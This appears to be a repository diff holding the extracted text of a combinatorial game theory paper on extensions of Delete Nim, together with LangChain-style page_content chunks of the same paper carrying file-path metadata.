+ In particular, if k = 2, this game is the same as Half-delete Nim, and if
273
+ k = n, this game is the same as ABO-delete Nim.
274
+ Definition 5.4. A positive integer whose remainder divided by k(k − 1)
275
+ lies between 1 and k − 1 is called a k-oddoid number, and any other positive
276
+ integer is called a k-evenoid number. A heap with an oddoid number of
277
+ tokens is called a k-oddoid heap, and a heap with an evenoid number of
278
+ tokens is called a k-evenoid heap.
279
+ 7
280
+
281
+ In particular, if k = 2, oddoid and evenoid numbers are consistent with
282
+ the usual notion of odd and even numbers.
283
+ Lemma 5.5.
284
+ (1) It is not possible to split an k-oddoid number into k k-oddoid numbers.
285
+ (2) All integers x between k and k(k − 1) can be split into k integers that
286
+ are between 1 and k − 1.
287
+ (3) Let s be a positive integer. Every k-evenoid number y < ks can be
288
+ split into k k-oddoid numbers which are less than ks−1.
289
+ Proof. (1) We can prove this in the similar way to (i) in the proof of Theorem
290
+ 3.2. That is, if we can split a k-oddoid number into k k-oddoid number,
291
+ then we have a contradiction because the sum of reminders of all k-oddoid
292
+ numbers split by k(k − 1) is between k and k(k − 1), which contradicts to
293
+ the original number is an k-oddoid number.
294
+ (2) Let x = kp + q (0 ≤ q ≤ k − 1). Then, 1 ≤ p ≤ k − 1. If p < k − 1,
295
+ then x = q(p + 1) + (k − q)p and if p = k − 1, then x = kp. Thus, for both
296
+ cases, x can be split into k numbers which are between 1 and k − 1.
297
+ (3) Since ks − k can be divided by k(k − 1), the reminder of ks divided
298
+ by k(k − 1) is k. Thus, the largest k-evenoid number less than ks is ks − k.
299
+ Therefore, for the case s ≤ 2, we have proved in (2).
300
+ Assume that s ≥ 3.
301
+ ks − k = k(ks−2 − 1)
302
+ k − 1
303
+ k(k − 1) + k(k − 1)
304
+ and k(ks−2−1)
305
+ k−1
306
+ is an integer, so for a k-evenoid number y < ks,
307
+ y = αk(k − 1) + β
308
+
309
+ α ≤ k(ks−2 − 1)
310
+ k − 1
311
+ , k ≤ β ≤ k(k − 1)
312
+
313
+ and we can split α into α1, α2, . . . , αk ≤
314
+ ks−2−1
315
+ k−1 .
316
+ From (2), we can also
317
+ split β into 1 ≤ β1, β2, . . . , βk ≤ k − 1. Let γi = αik(k − 1) + βi for any
318
+ 1 ≤ i ≤ k,then γ1, γ2, . . . , γk are all k-oddoid numbers, γ1 +γ2 +· · ·+γk = y,
319
+ and γi ≤ ks−2−1
320
+ k−1 k(k − 1) + k − 1 < ks−1.
321
+ Using this lemma, we can give the following winning strategy for k−1
322
+ k n-
323
+ delete Nim by replacing the odd and even heaps of Theorem 5.2 with k-
324
+ oddoid and k-evenoid heaps, respectively.
325
+ 8
326
+
327
+ Theorem 5.6. Let Z = ⟨z1, z2, . . . , zkm⟩ be the k−1
328
+ k n-delete nim position,
329
+ where each zi is the number of tokens and zi < zi+1. Let ks be the smallest
330
+ power of k greater than z(k−1)m+1. Then Z is a P-position if and only if
331
+ z1, z2, . . . , zkm satisfy both of the following two conditions:
332
+ (a) all z1, z2, . . . , z(k−1)m+1 are k-oddoid,
333
+ (b) For any l, if zl is k-evenoid, then ks ≤ zl.
334
+ Proof. Let P be the set of positions which satisfy both (a) and (b), and N
335
+ be the complement of P. We show a position in P has no option in P in (i),
336
+ and a position in N has at least one option in P in (ii) and (iii).
337
+ (i) Assume that in a move of k−1
338
+ k n-delete Nim, the remaining all m heaps
339
+ are k-oddoid heaps. Then from Lemma 5.5 (1), one can obtain at most k−1
340
+ k-oddoid heaps by splitting a remaining heap. Thus, each option is not in
341
+ P. Therefore, if an option of a position in P is also in P, a k-evenoid heap
342
+ has to be split into k k-oddoid heaps.
343
+ At least one k-oddoid heap after
344
+ this split has more than ks−1 stones. On the other hand, the player has to
345
+ split at least one of the heaps whose sizes are z1, z2, . . . , z(k−1)m+1, but any
346
+ k-evenoid heap from this split has less than ks stones, which contradicts to
347
+ (b).
348
+ (ii) Assume that (a) is not satisfied. That is, there exists a k-evenoid
349
+ zi (1 ≤ i ≤ (k − 1)m + 1). Let s be an integer such that ks−1 ≤ zi < ks.
350
+ Since zi is a k-evenoid number, s ≥ 2.
351
+ Consider to split i-th heap and
352
+ (k − 1)m + 2, (k − 1)m + 3, . . . , km-th heaps. From Lemma 5.5(3), zi can be
353
+ split into k k-oddoid heaps less than ks−1. If zj(j ≥ (k − 1)m + 2) is a k-
354
+ evenoid number, then let zj = αk(k − 1) + β(k ≤ β ≤ k(k − 1)). Then, from
355
+ Lemma 5.5(2), zj can be split into β1, β2, . . . , βk−1, αk(k − 1) + βk, where
356
+ 1 ≤ β1, β2, . . . , βk ≤ k. If zj(j ≥ (k −1)m+2) is a k-oddoid number, then zj
357
+ can be split into 1, 1, . . . , 1, zj−(k−1). Here, all ks−1, ks−1+1, . . . , ks−1+k−2
358
+ are k-evenoid number, so if ks−1 ≤ zi < zj and zj is a k-evenoid number,
359
+ then ks−1 ≤ zj − (k − 1). Therefore, for a position, if (a) is not satisfied,
360
+ then the position has an option in P.
361
+ (iii) Consider the case that (a) is satisfied but (b) is not satisfied. That is,
362
+ z1, z2, . . . , z(k−1)m+1 are k-oddoid numbers and there exists zi(i > (k−1)m+
363
+ 1) such that zi is a k-evenoid number and zi < ks. Split the heaps whose sizes
364
+ are z(k−1)m+1, z(k−1)m+2, . . . , zkm as follows: From Lemma 5.5(3), zi can be
365
+ split into k k-oddoid numbers less than ks−1. For other zj, similar to (ii), if zj
366
+ is a k-evenoid number, then it can be split into β1, β2, . . . , βk−1, αk(k−1)+βk
367
+ and if zj is a k-oddoid number, then it can be split into 1, 1, . . . , 1, zj−(k−1).
368
+ 9
369
+
370
+ Thus, for a position, if (a) is satisfied but (b) is not satisfied, then the
371
+ position has an option in P.
372
+ 6
373
+ Single-delete Nim
374
+ Finally, in this section, we consider Single-delete Nim. In this ruleset, the
375
+ player can remove only one heap.
376
+ 6.1
377
+ The rule of Single-delete Nim
378
+ Definition 6.1 (Single-delete Nim). There are n heaps of tokens.
379
+ The
380
+ player performs the following two operations in succession on his/her turn.
381
+ • Selects one heap and deletes it.
382
+ • Selects one heap of the remaining n − 1 heaps and splits it into two
383
+ heaps.
384
+ If n = 2, then the ruleset is the same as VDN, so this ruleset is a
385
+ generalization of VDN. The terminal position in Single-delete Nim is only
386
+ ⟨1, 1, . . . , 1⟩.
387
+ 6.2
388
+ Characterizing positions in Single-delete Nim
389
+ Theorem 6.2. If n = 3 in the Single-delete Nim, the position ⟨x, y, z⟩ is a
390
+ P-position if and only if v2(x) = v2(y) = v2(z).
391
+ This result was introduced in Sakai [5]. This theorem is a special case of
392
+ Theorem 4.2.
393
+ Further, we introduce a theorem for the case n = 4.
394
+ Theorem 6.3. Denote by Ik(z) the k-th digit from the bottom of the binary
395
+ representation of non-negative integer z. For n = 4 in the Single-delete Nim
396
+ position ⟨w, x, y, z⟩, let a = v2(w), b = v2(x), c = v2(y), d = v2(z).
397
+ If
398
+ a ≤ b ≤ c ≤ d, ⟨w, x, y, z⟩ is a P-position if and only if a, b, c, and d satisfy
399
+ one of the following conditions (1), (2), (3), (4), or (5).
400
+ (1) a = b = c = d.
401
+ (2) a < b = c = d and
402
+ (2A) Id+1(w) = 0.
403
+ 10
404
+
405
+ (3) a < b < c = d and the following conditions (3A)-(3C) are satisfied.
406
+ (3A) Id+1(w) = Id+1(x) = 0.
407
+ (3B) Ik(w) + Ik(x) ≥ 1 for b + 2 ≤ k ≤ d.
408
+ (3C) Ib+1(w) = 1.
409
+ (4) a < b < c < d and the following conditions (4A)-(4E) are satisfied.
410
+ (4A) Id+1(w) = Id+1(x) = Id+1(y) = 0.
411
+ (4B) Ij(w) + Ij(x) + Ij(y) ≥ 2 for c + 2 ≤ j ≤ d.
412
+ (4C) Ic+1(w) = Ic+1(x) = 1.
413
+ (4D) Ik(w) + Ik(x) ≥ 1 for b + 2 ≤ k ≤ c.
414
+ (4E) Ib+1(w) = 1.
415
+ (5)
416
+ a < b < c < d and the following conditions (5A)-(5F) are satisfied.
417
+ (5A) Ii(w) + Ii(x) + Ii(y) + Ii(z) ∈ {0, 3, 4} for i ≥ d + 2.
418
+ (5B) Id+1(w) = Id+1(x) = Id+1(y) = 1.
419
+ (5C) Ij(w) + Ij(x) + Ij(y) ≥ 2 for c + 2 ≤ j ≤ d.
420
+ (5D) Ic+1(w) = Ic+1(x) = 1.
421
+ (5E) Ik(w) + Ik(x) ≥ 1 for b + 2 ≤ k ≤ c.
422
+ (5F) Ib+1(w) = 1.
423
+ A proof of this theorem is shown in a Japanese report [6]. This theorem
424
+ solves only the case of n = 4, and the proof is long and complex, so we omit
425
+ it.
426
+ Acknowledgements
427
+ This work was partially supported by JSPS KAKENHI Grant Numbers
428
+ JP21K12191 and JP22K13953.
429
+ References
430
+ [1] Abuku, T., Sakai, K., Shinoda, M. and Suetsugu,K. : Determining the
431
+ Winner of Split-and-delete Nim, The 27th Game Programming Work-
432
+ shop, IPSJ, 17-24 (2022). (In Japanese)
433
+ 11
434
+
435
+ [2] Abuku, T. and Suetsugu, K. : Delete Nim, Journal of Mathematics,
436
+ Tokushima University 55, 75-81 (2021).
437
+ [3] Albert, M.H., Nowakousuki, R.J. and Wolfe, D. Lessons in Play: An
438
+ Introduction to Combinatorial Game Theory (2nd ed.), A K Peters/CRC
439
+ Press. (2019)
440
+ [4] Bouton, C.L.: Nim, a Game with a Complete Mathematical Theory,
441
+ Annals of Mathematics 3, 35-39 (1902).
442
+ [5] Sakai, K. :
443
+ Alice’s Adventure in Puzzle-Land Vol.4, Nikkei Science
444
+ (2021). (In Japanese)
445
+ [6] Shinoda, M. : Generalizations of Delete Nim Game and determining the
446
+ winner, The Special Interest Group Technical Reports of IPSJ Vol.2022-
447
+ GI-47, No.5. 1-8 (2022). (In Japanese)
448
+ [7] Siegel, A.N.: Combinatorial Game Theory, American Mathematical So-
449
+ ciety (2013).
450
+ [8] Stankova Z. and Rike T. (eds.) : A Decade of the Berkeley Math Circle
451
+ Vol.1, Mathematical Circles Library, 159 (2008).
452
+ 12
453
+
WtFOT4oBgHgl3EQf7zTC/content/tmp_files/load_file.txt ADDED
@@ -0,0 +1,433 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ filepath=/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf,len=432
2
+ page_content='arXiv:2301.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
3
+ page_content='12964v1 [math.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
4
+ page_content='CO] 30 Jan 2023 Some extensions of Delete Nim Tomoaki Abuku∗ Ko Sakai† Masato Shinoda‡ Koki Suetsugu§ 2022 Abstract Nim is a well-known combinatorial game with several variants, e.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
5
+ page_content='g.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
6
+ page_content=', Delete Nim and Variant Delete Nim.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
7
+ page_content=' In Variant Delete Nim, the player deletes one of the two heaps of stones and splits the other heap on his/her turn.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
8
+ page_content=' In this paper, we discuss generalized Variant Delete Nim, which generalizes the number of stone heaps to three or more, All-but- one-delete Nim, Half-delete Nim, No-more-than-half-delete Nim, and Single-delete Nim.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
9
+ page_content=' We study the win-loss conditions for each of these games.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
10
+ page_content=' 1 Introduction Combinatorial games are 2-player games with neither chance elements nor hidden information (for the details on combinatorial game theory, see, e.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
11
+ page_content='g.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
12
+ page_content=', Albert et al.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
13
+ page_content=' [3] and Siegel [7]).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
14
+ page_content=' Nim is one of the oldest and most well-known combinatorial games.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
15
+ page_content=' The basic rule of the game is that two players take turns choosing one of several heaps and take as many tokens from the heap as they like, and the player who cannot take a token from the heap loses.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
16
+ page_content=' In this paper, we only deal with the rule that a player loses if he/she cannot make any possible moves on his/her turn.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
17
+ page_content=' This rules is called the normal rule.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
18
+ page_content=' Nim is a two-player zero-sum complete information-confirmation finite game.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
19
+ page_content=' Since there are no draws, every position can be classified into two ∗National Institute of Informatics, buku3416@gmail.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
20
+ page_content='com †Kanagawa University, gummosakai@gmail.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
21
+ page_content='com ‡Nara Women’s University, shinoda@cc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
22
+ page_content='nara-wu.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
23
+ page_content='ac.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
24
+ page_content='jp §National Institute of Informatics, suetsugu.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
25
+ page_content='koki@gmail.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
26
+ page_content='com 1 types: N-position, in which the player whose turn it is to play has a strategy to win the game, and P-position, in which the player whose turn it is to play does not have a winning strategy.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
27
+ page_content=' The distinction mentioned above between N-positions and P-positions in Nim was shown by Bouton [4], and it is now known that the win-loss conditions of this game contain mathematically interesting structures.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
28
+ page_content=' In addition, a more detailed analysis of the game has been conducted to obtain the Sprague-Grundy values for each game.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
29
+ page_content=' The Sprague-Grundy values are useful for determining the winners of games that combine multiple games.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
30
+ page_content=' For more information on these games, refer to [3].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
31
+ page_content=' Variants of the game with different rules for taking tokens in Nim Moore’s game, Welter-Sato’s game (Maya game), Wythoff’s game, etc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
32
+ page_content=', have been proposed.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
33
+ page_content=' The mathematical analysis of these games is a subject of interest.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
34
+ page_content=' There are also games, such as Grundy’s game, for splitting heaps of tokens.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
35
+ page_content=' In this paper, we propose a generalization of Delete Nim and discuss its win-loss conditions.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
36
+ page_content=' This paper is organized as follows.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
37
+ page_content=' Section 2 describes the rules of Delete Nim;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
38
+ page_content=' the content of this section is concerned with the case where the number of stone heaps is two.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
39
+ page_content=' Section 3 and beyond describe the various rules for extending the number of stone heaps in Delete Nim to three or more and the conditions for determining the winners.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
40
+ page_content=' Section 3 deals with All-but-one- delete Nim, Section 4 with No-more-than-half-delete Nim, Section 5 with Half-delete Nim, and Section 6 with Single-delete Nim.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
41
+ page_content=' Note that there is a game with a rule called “Split-and-delete Nim” that reverses the order of deleting heaps and splitting heaps (see Abuku et al.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
42
+ page_content=' [1]).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
43
+ page_content=' In order to clearly distinguish between these rules, we call the rule defined in this paper “Delete-and-split Nim”.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
44
+ page_content=' 2 Delete Nim In this section, we review the rules of Delete Nim and the determination of winners and losers as previously mentioned in Abuku and Suetsugu [2].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
45
+ page_content=' Definition 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
46
+ page_content='1 (The rules of Delete Nim).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
47
+ page_content=' There are 2 heaps of tokens.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
48
+ page_content=' The player performs the following two operations in succession on his/her turn.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
49
+ page_content=' Selects a non-empty heap and deletes the other heap.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
50
+ page_content=' Removes 1 token from the selected heap and splits the heap into two (possibly empty heaps).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
51
+ page_content=' 2 The p-adic valuation of an integer n, which we shall denote by vp(n), is the exponent of the highest power of the prime number p that divides n.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
52
+ page_content=' In this paper, only 2-adic valuation will be treated.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
53
+ page_content=' Theorem 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
54
+ page_content='2 (Abuku and Suetsugu [2]).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
55
+ page_content=' Let ⟨x, y⟩ be a Delete Nim po- sition, where x and y represent the number of tokens in each heap.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
56
+ page_content=' The Sprague-Grundy value of ⟨x, y⟩ is v2((x ∨ y) + 1), where ∨ is the bitwise OR-operation.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
57
+ page_content=' In particular, ⟨x, y⟩ is a P-position if and only if both x and y are even.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
58
+ page_content=' The following game, called Variant Delete Nim or VDN, is defined in Stankova and Rike [8].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
59
+ page_content=' Definition 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
60
+ page_content='3 (The rules of VDN).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
61
+ page_content=' There are 2 heaps of tokens.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
62
+ page_content=' The player performs the following two operations in succession on his/her turn.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
63
+ page_content=' Selects one heap and deletes it.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
64
+ page_content=' Splits the remaining heap into 2 (non-empty) heaps.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
65
+ page_content=' VDN and Delete Nim are equivalent games with respect to legal moves.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
66
+ page_content=' We can see that the position ⟨x, y⟩ of VDN corresponds to the position ⟨x − 1, y − 1⟩ of Delete Nim.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
67
+ page_content=' Therefore, according to Theorem 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
68
+ page_content='2, in VDN, the condition that each member of the pair ⟨x, y⟩ be odd is required for ⟨x, y⟩ to be a P-position.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
69
+ page_content=' This decision condition is also included in Theorem 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
70
+ page_content='2 of this paper.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
71
+ page_content=' In the following sections, we will consider various rules when the number of token heaps n is generalized to 3 or more.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
72
+ page_content=' The extended rules discussed below all follow the VDN setting, where some of the n heaps of tokens are deleted and the remaining heaps are split, and the number of heaps n before and after the turn is assumed to remain the same.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
73
+ page_content=' Also, when splitting a heap of tokens every heap must contain at least one token.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
74
+ page_content=' The two operations that a player performs in a turn (deleting and split- ting a heap) are called a move, and a position that can be transitioned from one position to another by a single move is called an option.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
75
+ page_content=' A position that has no option is called a terminal position, and the player whose turn it is to play in this terminal position loses the game.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
76
+ page_content=' 3 All-but-one-delete Nim In this section, we introduce a variant of delete nim, All-but-one-delete Nim or ABO-delete Nim.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
77
+ page_content=' In this ruleset, all heaps except for one heap are removed in a move.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
78
+ page_content=' 3 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
79
+ page_content='1 The rule of ABO-delete Nim Definition 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
80
+ page_content='1 (ABO-delete Nim).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
81
+ page_content=' There are n heaps of tokens.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
82
